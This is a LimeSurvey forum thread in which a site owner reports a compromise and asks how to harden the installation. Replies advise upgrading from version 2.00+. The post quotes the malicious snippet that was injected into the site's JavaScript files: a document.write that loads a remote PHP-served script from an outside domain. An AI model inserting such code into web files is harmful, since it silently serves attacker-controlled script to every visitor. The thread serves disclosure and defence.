Hack report

More
3 years 9 months ago #105887 by Andrea01
Andrea01 created the topic: Hack report
Our limesurvey site was hacked last Friday by www.21cgreen.co.kr .

What I believe is that they got access to our ftp Server, but I am not sure.

Anyway, almost all .js files in "script Directory" and all template.js files in "template Directory" got infected.

They hacked the .js files by adding following code at the end:

/*1ebf93*/

/*ww0939426w09*/

document.write("<script type='text/javascript' src=' www.21cgreen.co.kr/yzQBfqrC.php?id=8928221 '></"+ "script>");


/*/1ebf93*/

We discovered the hack because the site was very slow yesterday.

In the meantime we have cleaned all files, changed our ftp Password and changed permission of files in These directories to 444.

Is there anything else we can do to make our site more secure?

Best regards
Andrea

Please Log in to join the conversation.

More
3 years 9 months ago #105896 by lowprofile
lowprofile replied the topic: Hack report
which version of limesurvey are you using?

Please Log in to join the conversation.

More
3 years 9 months ago #105914 by Andrea01
Andrea01 replied the topic: Hack report
Version 2.00+ Build 131206

Thank you

Please Log in to join the conversation.

More
3 years 9 months ago #105916 by c_schmitz
c_schmitz replied the topic: Hack report
You should always update to the latest version (2.05) as there were many security issues resolved since 2.0.

Best regards

Carsten Schmitz
LimeSurvey project leader

Please Log in to join the conversation.

More
3 years 9 months ago #105918 by Andrea01
Andrea01 replied the topic: Hack report
I already did, but I have this one Survey running on 2.o Version.

Thank you

Andrea

Please Log in to join the conversation.

Start now!

Just create your account and start using Limesurvey today.

Register now
Join our Newsletter!